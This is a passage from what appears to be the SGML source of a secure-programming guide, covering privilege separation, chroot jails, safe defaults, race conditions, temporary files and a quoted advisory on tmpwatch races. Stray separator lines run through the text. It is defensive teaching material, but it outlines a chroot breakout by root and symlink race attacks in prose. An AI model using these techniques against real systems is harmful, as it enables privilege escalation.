Note that the small, simple tool must do a thorough job checking its inputs
|
||
and limiting what it will pass along to the complex tool, or this can
|
||
be a vulnerability.
|
||
The communication could be via shell invocation, or any IPC mechanism.
|
||
These approaches can even be layered several ways, for example,
|
||
a complex user tool could call a simple setuid
|
||
``wrapping'' program (that checks its inputs for secure values)
|
||
that then passes on information to another complex trusted tool.
|
||
</para>
|
||
|
||
<para>
|
||
This approach is the normal approach for developing GUI-based applications
|
||
which requre privilege, but must be run by unprivileged users.
|
||
The GUI portion is run as a normal unprivileged user process;
|
||
that process then passes security-relevant requests on to another process
|
||
that has the special privileges (and does not trust the first process, but
|
||
instead limits the requests to whatever the user is allowed to do).
|
||
Never develop a program that is
|
||
privileged (e.g., using setuid) and also directly invokes a graphical toolkit:
|
||
Graphical toolkits aren't designed to be used this way, and it would be
|
||
extremely difficult to audit graphical toolkits
|
||
in a way to make this possible.
|
||
Fundamentally, graphical toolkits must be large, and it's extremely
|
||
unwise to place so much faith in the perfection of that much code, so
|
||
there is no point in trying to make them do what should never be done.
|
||
Feel free to create a small setuid program that invokes two separate programs:
|
||
one without privileges (but with the graphical interface), and one with
|
||
privileges (and without an external interface).
|
||
Or, create a small setuid program that can be invoked by the unprivileged
|
||
GUI application.
|
||
But never combine the two into a single process.
|
||
For more about this, see the statement by
|
||
<ulink url="http://www.gtk.org/setuid.html">Owen Taylor about GTK
|
||
and setuid, discussing why GTK_MODULES is not a security hole</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
Some applications can be best developed by dividing the problem
|
||
into smaller, mutually untrusting programs.
|
||
A simple way is divide up the problem into separate programs that
|
||
do one thing (securely), using the filesystem and locking to
|
||
prevent problems between them.
|
||
If more complex interactions are needed, one approach is to
|
||
fork into multiple processes, each of which has different privilege.
|
||
Communications channels can be set up in a variety of ways; one
|
||
way is to have a "master" process create communication channels
|
||
(say unnamed pipes or unnamed sockets),
|
||
then fork into different processes and have each process
|
||
drop as many privileges as possible.
|
||
If you're doing this, be sure to watch for deadlocks.
|
||
Then use a simple protocol to allow the less trusted processes
|
||
to request actions from the more trusted process(es), and ensure that the more
|
||
trusted processes only support a limited set of requests.
|
||
Setting user and group permissions so that no one else can even start
|
||
up the sub-programs makes it harder to break into.
|
||
</para>
|
||
|
||
<para>
|
||
Some operating systems have the concept of multiple
|
||
layers of trust in a single process, e.g., Multics' rings.
|
||
Standard Unix and Linux don't have a way of separating multiple levels of trust
|
||
by function inside a single process
|
||
like this; a call to the kernel increases privileges,
|
||
but otherwise a given process has a single level of trust.
|
||
This is one area where technologies like Java 2, C# (which copies
|
||
Java's approach), and
|
||
Fluke (the basis of security-enhanced Linux) have an advantage.
|
||
For example,
|
||
Java 2 can specify fine-grained permissions such as the permission to
|
||
only open a specific file.
|
||
However, general-purpose operating systems do not typically
|
||
have such abilities at this time; this may change in the near future.
|
||
For more about Java, see <xref linkend="java">.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="consider-fsuid">
|
||
<title>Consider Using FSUID To Limit Privileges</title>
|
||
|
||
<para>
|
||
Each Linux process has two Linux-unique state values called
|
||
filesystem user id (FSUID) and filesystem group id (FSGID).
|
||
These values are used when checking against the filesystem permissions.
|
||
If you're building a program that operates as a file server for arbitrary
|
||
users (like an NFS server), you might consider using these Linux extensions.
|
||
To use them, while holding root privileges change
|
||
just FSUID and FSGID before accessing files on behalf of a normal user.
|
||
This extension is fairly useful, and provides a mechanism for limiting
|
||
filesystem access rights without removing other (possibly necessary) rights.
|
||
By only setting the FSUID (and not the EUID), a local user cannot send
|
||
a signal to the process.
|
||
Also, avoiding race conditions is much easier in this situation.
|
||
However, a disadvantage of this approach
|
||
is that these calls are not portable to other Unix-like systems.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="consider-chroot">
|
||
<title>Consider Using Chroot to Minimize Available Files</title>
|
||
|
||
<para>
|
||
You can use chroot(2) to limit the files visible to your program.
|
||
This requires carefully setting up a directory (called the ``chroot jail'')
|
||
and correctly entering it.
|
||
This can be a fairly effective technique for improving a program's
|
||
security - it's hard to interfere with files you can't see.
|
||
However, it depends on a whole bunch of assumptions, in particular,
|
||
the program must lack root privileges, it must not have any way to get
|
||
root privileges, and the chroot jail must be properly set up
|
||
(e.g., be careful what you put inside the chroot jail, and make sure that
|
||
users can never control its contents before calling chroot).
|
||
I recommend using chroot(2) where it makes sense to do so, but don't depend
|
||
on it alone; instead, make it part of a layered set of defenses.
|
||
Here are a few notes about the use of chroot(2):
|
||
|
||
<itemizedlist>
|
||
<listitem>
|
||
|
||
<para>
|
||
The program can still use non-filesystem objects that are shared
|
||
across the entire machine
|
||
(such as System V IPC objects and network sockets).
|
||
It's best to also
|
||
use separate pseudo-users and/or groups, because all Unix-like systems include
|
||
the ability to isolate users; this will at least limit the damage
|
||
a subverted program can do to other programs.
|
||
Note that current most Unix-like systems (including Linux)
|
||
won't isolate intentionally cooperating programs; if you're worried about
|
||
malicious programs cooperating, you need to get a system that implements
|
||
some sort of mandatory access control and/or limits covert channels.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
Be sure to close any filesystem descriptors to outside files if you
|
||
don't want them used later.
|
||
In particular, don't have any descriptors open to directories outside
|
||
the chroot jail, or set up a situation where such a descriptor could be
|
||
given to it (e.g., via Unix sockets or an old implementation of /proc).
|
||
If the program is given a descriptor to a directory outside the chroot jail,
|
||
it could be used to escape out of the chroot jail.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
The chroot jail has to be set up to be secure - it must never be
|
||
controlled by a user and every file added must be carefully examined.
|
||
Don't use a normal user's home directory, subdirectory, or
|
||
other directory that can ever be controlled by a user as a chroot jail;
|
||
use a separate directory specially set aside
|
||
for the purpose.
|
||
<!-- http://msgs.securepoint.com/cgi-bin/get/bugtraq0004/64/1/1/2.html -->
|
||
<!--
|
||
http://marc.theaimsgroup.com/?l=qmail&m=100128344722211&w=2
|
||
-->
|
||
Using a directory controlled by a user is a disaster - for example,
|
||
the user could create a ``lib'' directory containing a trojaned linker or libc
|
||
(and could link a setuid root binary into that space, if the files you
|
||
save don't use it).
|
||
Place the absolute minimum number of files and directories there.
|
||
Typically you'll have a /bin, /etc/, /lib, and maybe one or two others
|
||
(e.g., /pub if it's an ftp server).
|
||
Place in /bin only what you need to run after doing the chroot(); sometimes
|
||
you need nothing at all (try to avoid placing a shell like /bin/sh
|
||
there, though sometimes that can't be helped).
|
||
You may need a /etc/passwd and /etc/group so file listings can show
|
||
some correct names, but if so, try not to include the real system's
|
||
values, and certainly replace all passwords with "*".
|
||
</para>
|
||
|
||
<para>
|
||
In /lib, place only what you need; use ldd(1) to query each program in /bin
|
||
to find out what it needs, and only include them.
|
||
On Linux, you'll probably need a few basic libraries like ld-linux.so.2, and
|
||
not much else.
|
||
Alternatively, recompile any necessary programs to be statically linked,
|
||
so that they
|
||
don't need dynamically loaded libraries at all.
|
||
</para>
|
||
|
||
<para>
|
||
It's usually wiser to completely copy in all files, instead of making
|
||
hard links; while this wastes some time and disk space, it makes it so that
|
||
attacks on the chroot jail files do not automatically propagate into the
|
||
regular system's files.
|
||
Mounting a /proc filesystem, on systems where this is supported, is
|
||
generally unwise. In fact, in very old versions of Linux (versions 2.0.x,
|
||
at least up through 2.0.38) it's a
|
||
known security flaw, since there are pseudo-directories in /proc that
|
||
would permit a chroot'ed program to escape.
|
||
Linux kernel 2.2 fixed this known problem, but there may be others; if
|
||
possible, don't do it.
|
||
</para>
|
||
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
Chroot really isn't effective if
|
||
the program can acquire root privilege.
|
||
For example, the program could use calls like mknod(2) to create a device
|
||
file that can view physical memory, and then use the resulting
|
||
device file to modify kernel memory to give itself
|
||
whatever privileges it desired.
|
||
Another example of how a root program can break out of chroot
|
||
is demonstrated at
|
||
<ulink
|
||
url="http://www.suid.edu/source/breakchroot.c">http://www.suid.edu/source/breakchroot.c</ulink>.
|
||
In this example, the program opens a file descriptor for
|
||
the current directory, creates and chroots into a subdirectory, sets
|
||
the current directory to the previously-opened current directory,
|
||
repeatedly cd's up from the current directory (which since it is
|
||
outside the current chroot succeeds in moving up to the real filesystem
|
||
root), and then calls chroot on the result.
|
||
By the time you read this, these weaknesses may have been plugged,
|
||
but the reality is that root privilege has traditionally meant ``all
|
||
privileges'' and it's hard to strip them away.
|
||
It's better to assume that a program requiring continuous root privileges
|
||
will only be mildly helped using chroot().
|
||
Of course, you may be able to break your program into parts, so that
|
||
at least part of it can be in a chroot jail.
|
||
</para>
|
||
</listitem>
|
||
|
||
</itemizedlist>
|
||
|
||
</para>
|
||
|
||
</sect2>
|
||
<sect2 id="minimize-accessible-data">
|
||
<title>Consider Minimizing the Accessible Data</title>
|
||
|
||
<para>
|
||
Consider minimizing the amount of data that can be accessed by the user.
|
||
For example, in CGI scripts, place all data used by the CGI script
|
||
outside of the document tree unless there is a reason the user needs to
|
||
see the data directly.
|
||
Some people have the false notion that, by not publicly providing a
|
||
link, no one can access the data, but this is simply not true.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="minimize-resources">
|
||
<title>Consider Minimizing the Resources Available</title>
|
||
<para>
|
||
Consider minimizing the computer resources available to a given
|
||
process so that, even if it ``goes haywire,'' its damage can be limited.
|
||
This is a fundamental technique for preventing a denial of service.
|
||
For network servers,
|
||
a common approach is to set up a separate process for each session,
|
||
and for each process limit the amount of CPU time (et cetera) that session
|
||
can use.
|
||
That way, if an attacker makes a request that chews up memory or uses
|
||
100% of the CPU, the limits will kick in and prevent that single session
|
||
from interfering with other tasks.
|
||
Of course, an attacker can establish many sessions, but this at least
|
||
raises the bar for an attack.
|
||
See <xref linkend="quotas"> for more information on how to set these limits
|
||
(e.g., ulimit(1)).
|
||
</para>
|
||
</sect2>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="minimize-functionality">
|
||
<title>Minimize the Functionality of a Component</title>
|
||
<para>
|
||
In a related move, minimize the amount of functionality provided by
|
||
your component.
|
||
If it does several functions, consider breaking its implementation up into
|
||
those smaller functions.
|
||
That way, users who don't need some functions can disable just those portions.
|
||
This is particularly important when a flaw is discovered - this way, users
|
||
can disable just one component and still use the other parts.
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="avoid-setuid">
|
||
<title>Avoid Creating Setuid/Setgid Scripts</title>
|
||
<para>
|
||
Many Unix-like systems, in particular Linux, simply ignore the
|
||
setuid and setgid bits on scripts to avoid the race condition
|
||
described earlier.
|
||
Since support for setuid scripts varies on Unix-like systems,
|
||
they're best avoided in new applications where possible.
|
||
As a special case, Perl includes a special setup to support setuid Perl
|
||
scripts, so using setuid and setgid is acceptable in Perl if you
|
||
truly need this kind of functionality.
|
||
If you need to support this kind of functionality in your own
|
||
interpreter, examine how Perl does this.
|
||
Otherwise, a simple approach is to ``wrap'' the script with a small
|
||
setuid/setgid executable that creates a safe environment
|
||
(e.g., clears and sets environment variables) and then
|
||
calls the script (using the script's full path).
|
||
Make sure that the script cannot be changed by an attacker!
|
||
Shell scripting languages have additional problems, and really should
|
||
not be setuid/setgid; see <xref linkend="shell">
|
||
for more information about this.
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="safe-configure">
|
||
<title>Configure Safely and Use Safe Defaults</title>
|
||
|
||
<para>
|
||
Configuration is considered to currently be the number one security problem.
|
||
Therefore, you should spend some effort to (1) make the initial installation
|
||
secure, and (2) make it easy to reconfigure the system while keeping it secure.
|
||
</para>
|
||
|
||
<para>
|
||
Never have the installation routines install a working ``default'' password.
|
||
If you need to install new ``users'', that's fine - just set them up with
|
||
an impossible password, leaving time for administrators to set the password
|
||
(and leaving the system secure before the password is set).
|
||
Administrators will probably install hundreds of packages and almost
|
||
certainly forget to set the password - it's likely they won't even know
|
||
to set it, if you create a default password.
|
||
<!-- This has hurt many a system, for example,
|
||
Red Hat did this with the ``piranha'' package (it was widely denounced
|
||
in April 1999), and Microsoft did this with SQL Server 7.0 when running
|
||
in ``mixed mode''. -->
|
||
<!-- http://slashdot.org/articles/00/08/21/0759251.shtml,
|
||
http://www.securityfocus.com/frames/?content=/templates/archive.pike%3Flist%3D1%26date%3D2000-08-15%26msg%3DB9D1827FDF66D111925800805F3102E31E7AAB6E%40RED-MSG-57 -->
|
||
</para>
|
||
|
||
<para>
|
||
A program should have the most restrictive access policy
|
||
until the administrator has a chance to configure it.
|
||
Please don't create ``sample'' working users or
|
||
``allow access to all'' configurations as the starting configuration;
|
||
many users just ``install everything'' (installing all available services)
|
||
and never get around to configuring many services.
|
||
In some cases the program may be able to determine that a more generous
|
||
policy is reasonable by depending on the existing authentication system,
|
||
for example, an ftp server could legitimately determine that a user who
|
||
can log into a user's directory should be allowed to access that user's files.
|
||
Be careful with such assumptions, however.
|
||
</para>
|
||
|
||
<para>
|
||
Have installation scripts install a program as safely as possible.
|
||
By default, install all files as owned by root or some other
|
||
system user and make them unwriteable by others;
|
||
this prevents non-root users from installing viruses.
|
||
Indeed, it's best to make them unreadable by all but the trusted user.
|
||
Allow non-root installation where possible as well, so that users without
|
||
root privileges and administrators who do not fully trust the
|
||
installer can still use the program.
|
||
</para>
|
||
|
||
<para>
|
||
When installing, check to make sure that any assumptions necessary for
|
||
security are true.
|
||
Some library routines are not safe on some platforms; see the discussion of
|
||
this in <xref linkend="call-only-safe">.
|
||
If you know which platforms your application will run on, you need not
|
||
check their specific attributes, but in that case you should
|
||
check to make sure that the program is being installed on only one of
|
||
those platforms.
|
||
Otherwise, you should require a manual override to install the program,
|
||
because you don't know if the result will be secure.
|
||
</para>
|
||
|
||
<para>
|
||
Try to make configuration as easy and clear as possible, including
|
||
post-installation configuration.
|
||
Make using the ``secure'' approach as easy as possible, or many users
|
||
will use an insecure approach without understanding the risks.
|
||
On Linux,
|
||
take advantage of tools like linuxconf, so that users can easily configure
|
||
their system using an existing infrastructure.
|
||
</para>
|
||
|
||
<para>
|
||
If there's a configuration language, the default should be to deny access
|
||
until the user specifically grants it.
|
||
Include many clear comments in the sample configuration file, if there is one,
|
||
so the administrator understands what the configuration does.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
|
||
<sect1 id="init-safe">
|
||
<title>Load Initialization Values Safely</title>
|
||
|
||
<para>
|
||
Many programs read an initialization file to allow their defaults to be
|
||
configured.
|
||
You must ensure that an attacker can't change which initialization file
|
||
is used, nor create or modify that file.
|
||
Often you should <emphasis>not</emphasis> use the current directory
|
||
as a source of this information, since if the program is used as an
|
||
editor or browser, the user may be viewing the directory controlled
|
||
by someone else.
|
||
<!-- Joe had this problem: http://lwn.net/2001/0301/a/sec-joe.php3 -->
|
||
Instead, if the program is a typical user application, you should load
|
||
any user defaults from a hidden file or directory contained in the user's
|
||
home directory.
|
||
If the program is setuid/setgid, don't read any file controlled by the
|
||
user unless you carefully filter it as an untrusted (potentially
|
||
hostile) input.
|
||
Trusted configuration values should be loaded from somewhere else
|
||
entirely (typically from a file in /etc).
|
||
</para>
|
||
</sect1>
|
||
|
||
|
||
<sect1 id="fail-safe">
|
||
<title>Fail Safe</title>
|
||
|
||
<para>
|
||
A secure program should always ``fail safe'', that is,
|
||
it should be designed so that if the program does fail, the safest
|
||
result should occur.
|
||
For security-critical programs, that usually means that
|
||
if some sort of misbehavior is detected (malformed input,
|
||
reaching a ``can't get here'' state, and so on), then the program
|
||
should immediately deny service and stop processing that request.
|
||
Don't try to ``figure out what the user wanted'': just deny the service.
|
||
Sometimes this can decrease reliability or useability
|
||
(from a user's perspective), but it increases security.
|
||
There are a few cases where this might not be desired (e.g., where denial of
|
||
service is much worse than loss of confidentiality or integrity), but
|
||
such cases are quite rare.
|
||
</para>
|
||
|
||
<para>
|
||
Note that I recommend ``stop processing the request'', not ``fail altogether''.
|
||
In particular, most servers should not completely halt when given malformed
|
||
input, because that creates a trivial opportunity for a denial of service
|
||
attack (the attacker just sends garbage bits to prevent you from using the
|
||
service).
|
||
Sometimes taking the whole server down is necessary, in particular,
|
||
reaching some ``can't get here'' states may signal a problem so drastic
|
||
that continuing is unwise.
|
||
</para>
|
||
|
||
<para>
|
||
Consider carefully what error message you send back when a failure is detected.
|
||
if you send nothing
|
||
back, it may be hard to diagnose problems, but sending back too much
|
||
information may unintentionally aid an attacker.
|
||
Usually the best approach is to reply with ``access denied'' or
|
||
``miscellaneous error encountered'' and then
|
||
write more detailed information to an audit log (where you can have more
|
||
control over who sees the information).
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="avoid-race">
|
||
<title>Avoid Race Conditions</title>
|
||
|
||
<para>
|
||
A ``race condition'' can be defined as
|
||
``Anomalous behavior due to unexpected critical dependence
|
||
on the relative timing of events''
|
||
[FOLDOC].
|
||
Race conditions generally involve one or more processes
|
||
accessing a shared resource (such a file or variable), where this
|
||
multiple access has not been properly controlled.
|
||
</para>
|
||
|
||
<para>
|
||
In general, processes do not execute atomically;
|
||
another process may interrupt it between essentially any two instructions.
|
||
If a secure program's process is not prepared for these interruptions,
|
||
another process may be able to interfere with the secure program's process.
|
||
Any pair of operations in a secure program must still work correctly
|
||
if arbitrary amounts of another process's code is executed between them.
|
||
</para>
|
||
|
||
<para>
|
||
Race condition problems can be notionally divided into two categories:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
Interference caused by untrusted processes.
|
||
Some security taxonomies call this problem a
|
||
``sequence'' or ``non-atomic'' condition.
|
||
These are conditions caused by processes running other, different programs,
|
||
which ``slip in'' other actions between steps of the secure program.
|
||
These other programs might be invoked by an attacker specifically
|
||
to cause the problem.
|
||
This book will call these sequencing problems.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Interference caused by trusted processes (from the secure program's
|
||
point of view).
|
||
Some taxonomies call these deadlock, livelock, or locking failure conditions.
|
||
These are conditions caused by processes running the ``same'' program.
|
||
Since these different processes may have the ``same'' privileges, if
|
||
not properly controlled they may be able to interfere with each other in
|
||
a way other programs can't.
|
||
Sometimes this kind of interference can be exploited.
|
||
This book will call these locking problems.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para>
|
||
|
||
|
||
<!-- http://webreview.com/wr/pub/97/08/08/bookshelf Suggested
|
||
this kind of division:
|
||
|
||
Sequence conditions: Be aware that your program does not
|
||
execute atomatically. That is, the program can be interrupted
|
||
between any two operations to let another program run for a
|
||
while-including one that is trying to abuse yours. Thus, check
|
||
your code carefully for any pair of operations that might fail if
|
||
arbitrary code is executed between them.
|
||
|
||
Deadlock conditions: Remember, more than one copy of your
|
||
program may be running at the same time. Use file locking for
|
||
any files that you modify.
|
||
Provide a way to recover the locks in
|
||
the event that the program crashes while a lock is held. Avoid
|
||
deadlocks or "deadly embraces," which can occur when one
|
||
program attempts to lock file A and then file B, while another
|
||
program already holds a lock for file B and then attempts to
|
||
lock file A.
|
||
-->
|
||
|
||
<sect2 id="non-atomic">
|
||
<title>Sequencing (Non-Atomic) Problems</title>
|
||
|
||
<para>
|
||
In general,
|
||
you must check your code for any pair of operations that might fail if
|
||
arbitrary code is executed between them.
|
||
</para>
|
||
|
||
<para>
|
||
Note that loading and saving a shared variable are usually implemented
|
||
as separate operations and are not atomic.
|
||
This means that an ``increment variable'' operation is usually converted into
|
||
loading, incrementing, and saving operation, so if the variable memory
|
||
is shared the other process may interfere with the incrementing.
|
||
</para>
|
||
|
||
<para>
|
||
<!-- ??? Extend this. -->
|
||
Secure programs must determine if a request should be granted, and if
|
||
so, act on that request.
|
||
There must be no way for an untrusted user to change anything used in
|
||
this determination before the program acts on it.
|
||
This kind of race condition is sometimes termed a
|
||
``time of check - time of use'' (TOCTOU) race condition.
|
||
</para>
|
||
|
||
<sect3 id="atomic-filesystem">
|
||
<title>Atomic Actions in the Filesystem</title>
|
||
|
||
<para>
|
||
The problem of failing to perform atomic actions
|
||
repeatedly comes up in the filesystem.
|
||
In general, the filesystem is a shared resource used by many programs,
|
||
and some programs may interfere with its use by other programs.
|
||
Secure programs should generally avoid using access(2) to determine
|
||
if a request should be granted, followed later by open(2), because users
|
||
may be able to move files around between these calls, possibly creating
|
||
symbolic links or files of their own choosing instead.
|
||
A secure program should instead set its effective id or filesystem id,
|
||
then make the open call directly.
|
||
It's possible to use access(2) securely, but only when a user cannot affect
|
||
the file or any directory along its path from the filesystem root.
|
||
</para>
|
||
|
||
<para>
|
||
When creating a file, you should
|
||
open it using the modes O_CREAT | O_EXCL and grant only
|
||
very narrow permissions (only to the current user);
|
||
you'll also need to prepare for having the open fail.
|
||
If you need to be able to open the file (e.g,. to prevent a
|
||
denial-of-service), you'll need to repetitively
|
||
(1) create a ``random'' filename, (2) open the file as noted,
|
||
and (3) stop repeating when the open succeeds.
|
||
</para>
|
||
|
||
<para>
|
||
Ordinary programs can become security weaknesses if they
|
||
don't create files properly.
|
||
For example, the ``joe'' text editor had a weakness called the
|
||
``DEADJOE'' symlink vulnerability.
|
||
When joe was exited in a nonstandard way (such as a system crash, closing an
|
||
xterm, or a network connection going down), joe would unconditionally append
|
||
its open buffers to the file "DEADJOE".
|
||
This could be exploited by the
|
||
creation of DEADJOE symlinks in directories where root would normally use joe.
|
||
In this way, joe could be used to append garbage to
|
||
potentially-sensitive files, resulting in a denial of service and/or
|
||
unintentional access.
|
||
<!-- This joe issue was noted in various places in the year 2000;
|
||
the note is from the Red Hat vulnerability summary. -->
|
||
</para>
|
||
|
||
<!-- From http://java.sun.com/security/seccodeguide.html:
|
||
In the same vein, it's often better to use fchmod() and
|
||
fchown() instead of chmod(), chown(), and chgrp().
|
||
If you close a file and then use chmod() to change the permissions, and
|
||
the file or a directory in the directory's path is writeable by another,
|
||
an attacker may be able to remove the file and create a symbolic link
|
||
to another file (say /etc/passwd, to add/remove interesting values, or
|
||
to /dev/zero, to provide an infinitely-long data stream of input to
|
||
your program).
|
||
|
||
From http://webreview.com/wr/pub/97/08/08/bookshelf:
|
||
In particular, when you are performing a series of operations on a
|
||
file, such as changing its owner, stat ing the file, or changing its
|
||
mode, first open the file and then use the fchown( ), fstat( ), or
|
||
fchmod( ) system calls. Doing so will prevent the file from being
|
||
replaced while your program is running (a possible race condition).
|
||
Also avoid the use of the access( ) function to determine your ability
|
||
to access a file: using the access( ) function followed by an open( ) is
|
||
a race condition, and almost always a bug.
|
||
-->
|
||
|
||
<para>
|
||
As another example, when performing a series of operations on a file's
|
||
meta-information (such as changing its owner, stat-ing the file, or
|
||
changing its permission bits), first open the file and then use the
|
||
operations on open files.
|
||
This means use the fchown( ), fstat( ), or fchmod( ) system calls,
|
||
instead of the functions taking filenames
|
||
such as chown(), chgrp(), and chmod().
|
||
Doing so will prevent the file from being
|
||
replaced while your program is running (a possible race condition).
|
||
For example, if you close a file and then use chmod()
|
||
to change its permissions,
|
||
an attacker may be able to move or remove the file between those
|
||
two steps and create a symbolic link to another file
|
||
(say /etc/passwd).
|
||
Other interesting files include /dev/zero, which can
|
||
provide an infinitely-long data stream of input to a program; if an
|
||
attacker can ``switch'' the file midstream, the results can be dangerous.
|
||
<!-- Based on http://java.sun.com/security/seccodeguide.html and
|
||
http://webreview.com/wr/pub/97/08/08/bookshelf: -->
|
||
</para>
|
||
|
||
<para>
|
||
But even this gets complicated - when creating files, you must give
|
||
them as a minimal set of rights as possible, and then change the
|
||
rights to be more expansive if you desire.
|
||
Generally, this means you need to use umask and/or open's parameters to
|
||
limit initial access to just the user and user group.
|
||
For example, if you create a file that is initially world-readable, then
|
||
try to turn off the ``world readable'' bit, an attacker could try to
|
||
open the file while the permission bits said this was okay.
|
||
On most Unix-like systems, permissions are only checked on open, so
|
||
this would result in an attacker having more privileges than intended.
|
||
</para>
|
||
|
||
<para>
|
||
In general, if multiple users can write to a directory in a Unix-like
|
||
system, you'd better have the ``sticky'' bit set on that directory,
|
||
and sticky directories had better be implemented.
|
||
It's much better to completely avoid the problem, however, and create
|
||
directories that only a trusted special process can access
|
||
(and then implement that carefully).
|
||
The traditional Unix temporary directories (/tmp and /var/tmp) are usually
|
||
implemented as ``sticky'' directories, and all sorts of security problems
|
||
can still surface, as we'll see next.
|
||
</para>
|
||
|
||
</sect3>
|
||
|
||
<sect3 id="temporary-files">
|
||
<title>Temporary Files</title>
|
||
|
||
<para>
|
||
This issue of correctly performing atomic operations
|
||
particularly comes up when creating temporary files.
|
||
Temporary files in Unix-like systems are traditionally
|
||
created in the /tmp or /var/tmp directories,
|
||
which are shared by all users.
|
||
A common trick by attackers is to create symbolic links in the
|
||
temporary directory to some other file (e.g., /etc/passwd)
|
||
while your secure program is running.
|
||
The attacker's goal is to create
|
||
a situation where the secure program determines that
|
||
a given filename doesn't exist, the attacker then creates the symbolic
|
||
link to another file, and then the secure program performs some operation
|
||
(but now it actually opened an unintended file).
|
||
Often important files can be clobbered or modified this way.
|
||
There are many variations to this attack, such as creating normal files,
|
||
all based on the
|
||
idea that the attacker can create (or sometimes
|
||
otherwise access) file system objects
|
||
in the same directory used by the secure program for temporary files.
|
||
</para>
|
||
|
||
<para>
|
||
Michal Zalewski exposed in 2002 another serious problem with
|
||
temporary directories involving automatic cleaning of temporary directories.
|
||
For more information, see his
|
||
posting to Bugtraq dated December 20, 2002,
|
||
(subject "[RAZOR] Problems with mkstemp()").
|
||
Basically, Zalewski notes that
|
||
it's a common practice to have a program automatically sweep
|
||
temporary directories like /tmp and /var/tmp and remove "old" files
|
||
that have not been accessed for a while (e.g., several days).
|
||
Such programs are sometimes called "tmp cleaners" (pronounced "temp cleaners").
|
||
Possibly the most common tmp cleaner is "tmpwatch" by
|
||
Erik Troan and Preston Brown of Red Hat Software;
|
||
another common one is 'stmpclean' by Stanislav Shalunov;
|
||
many administrators roll their own as well.
|
||
Unfortunately, the existance of tmp cleaners creates an opportunity
|
||
for new security-critical race conditions;
|
||
an attacker may be able to arrange things so that the tmp cleaner
|
||
interferes with the secure program.
|
||
For example, an attacker could create an "old" file, arrange for
|
||
the tmp cleaner to plan to delete the file, delete the file himself,
|
||
and run a secure program that creates the same file - now the tmp cleaner
|
||
will delete the secure program's file!
|
||
Or, imagine that a secure program can have long delays after using the file
|
||
(e.g., a setuid program stopped with SIGSTOP and
|
||
resumed after many days with SIGCONT, or simply intentionally creating
|
||
a lot of work).
|
||
If the temporary file isn't used for long enough,
|
||
its temporary files are likely to be
|
||
removed by the tmp cleaner.
|
||
</para>
|
||
<!--
|
||
Date: Sun, 22 Dec 2002 01:57:27 -0800 (PST)
|
||
From: "Michal Zalewski" lcamtuf, at, coredump dot cx
|
||
Subject: [RAZOR] Problems with mkstemp() (fwd)
|
||
|
||
|
||
Dave,
|
||
|
||
Thought you might be interested. I think there are some things you
|
||
might want to look at in the /tmp-related section of your FAQ (apologies if
|
||
you already got this).
|
||
|
||
Date: Fri, 20 Dec 2002 09:30:30 -0800 (PST)
|
||
From: Michal Zalewski <lcamtuf@ghettot.org>
|
||
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
|
||
full-disclosure@netsys.com
|
||
Cc: secprog@securityfocus.com
|
||
Subject: [RAZOR] Problems with mkstemp()
|
||
|
||
|
||
Common use of 'tmpwatch' utility and its counterparts triggers race
|
||
conditions in many applications
|
||
|
||
Michal Zalewski <lcamtuf@razor.bindview.com>, 12/05/2002
|
||
Copyright (C) 2002 by Bindview Corporation
|
||
|
||
|
||
1) Scope and exposure info
|
||
=====
|
||
|
||
A common practice of installing 'tmpwatch' utility or similar
|
||
software
|
||
configured to sweep the /tmp directory on Linux and unix systems can
|
||
compromise secure temporary file creation mechanisms in certain
|
||
applications,
|
||
creating a potential privilege escalation scenario. This document
|
||
briefly
|
||
discusses the exposure, providing some examples, and suggesting
|
||
possible
|
||
workarounds.
|
||
|
||
It is believed that many unix operating systems using 'tmpwatch' or
|
||
an
|
||
equivalent are affected. Numerous Linux systems, such as Red Hat,
|
||
that ship
|
||
with cron daemon running and 'tmpwatch' configured to sweep /tmp are
|
||
susceptible to the attack.
|
||
|
||
|
||
2) Application details
|
||
=====
|
||
|
||
'Tmpwatch' is a handy utility that removes files which haven't been
|
||
accessed for a period of time. It was developed by Erik Troan and
|
||
Preston Brown of Red Hat Software, and, with time, has become a
|
||
component of many Linux distributions, also ported to platforms
|
||
such as Solaris, *BSD or HP/UX. By default, it is installed with a
|
||
crontab entry that sweeps /tmp directory on a daily basis, deleting
|
||
files that have not been accessed for the past few days.
|
||
|
||
An alternative program, called 'stmpclean' and authored by Stanislav
|
||
Shalunov, is shipped with *BSD systems and some Linux distributions
|
||
to perform the same task, and some administrators deploy other tools
|
||
or
|
||
scripts for this purpose.
|
||
|
||
|
||
3) Vulnerability details
|
||
=====
|
||
|
||
Numerous applications rely either on mkstemp() or custom O_EXCL file
|
||
creation mechanisms to store temporary data in the /tmp directory
|
||
in a secure manner. Of those, certain programs run with elevated
|
||
privileges, or simply at a different privilege level than the caller.
|
||
|
||
The exposure is a result of a common misconception, promoted by
|
||
almost
|
||
all secure programming tutorials and manpages, that /tmp files
|
||
created
|
||
with mkstemp(), granted that umask() settings were proper, are
|
||
safe against hijacking and common races. The file, since it is
|
||
created
|
||
in a sticky-bit directory, indeed cannot be removed or replaced by
|
||
the attacker running with different non-root privileges, but since
|
||
many operating systems feature 'tmpwatch'-alike solutions, the only
|
||
thing that can and should be considered safe in /tmp is the
|
||
descriptor
|
||
returned by mkstemp() - the filename should not be relied upon. There
|
||
are two major reasons for this:
|
||
|
||
1) unlink() races
|
||
|
||
It is very difficult to remove a file without risking a potential
|
||
race (see section 4). 'Tmpwatch' does not take any extra measures
|
||
to
|
||
prevent races, and probes file creation time using lstat(). Based
|
||
on this
|
||
data, it calls unlink() as root. Problem is, on a multitasking
|
||
system, it
|
||
is possible for the attacker to get some CPU time between those
|
||
two system
|
||
